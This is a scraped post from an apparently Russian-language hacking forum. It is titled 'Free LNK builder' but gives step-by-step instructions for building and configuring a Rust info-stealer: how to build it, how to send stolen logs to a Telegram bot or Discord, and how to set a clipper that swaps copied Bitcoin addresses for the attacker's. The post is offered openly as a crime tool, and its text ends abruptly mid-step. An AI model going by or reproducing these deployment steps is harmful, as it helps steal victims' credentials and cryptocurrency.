• XSS.stack #1 – первый литературный журнал от юзеров форума

Free LNK builder

Пожалуйста, обратите внимание, что пользователь заблокирован
The guide is pretty self explanatory

Requirements ( Do this to be able to run the program )​

  • Install Rustup
  • Install VS Studio and select Desktop development with C++ (needed for library linking)
  • Clone this repo
  • Go to the newly created directory
    • cd rust-stealer
  • Now open the main.rsin your favorite IDE
    • We are recommend VSC ( Visual studio code )
    • With VSC type in your cmd code src/main.rs

Telegram ( to receive logs in telegram )​

  • Change the Delivery Mode to Telegram const MODE: DeliveryMethod = DeliveryMethod::tELEGRAM;
  • Add between the two quotes your Telegram Bot Token const BOT_TOKEN: &str = "";
    • It will look something like this const BOT_TOKEN: &str = "5557828732:AAGVvR8uOQxKW160blzw8OUnQeOLKULZccg";
  • After that add your Channel ID where you want to receive the logs const CHANNEL_ID: i64 = -0

Discord ( to receive logs in discord )​

Build ( make your .exe file )​

  • Go back to your cmd
  • Type cargo build --release
  • When the command is finished the builded stealer can be found at .\target\release\

Clipper ( switches copied btc address with yours )​

  • Go into clipper\mod.rs
  • Now Insert Every Address/Wallet you wanna clip into this (Make sure it's between the two ".
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх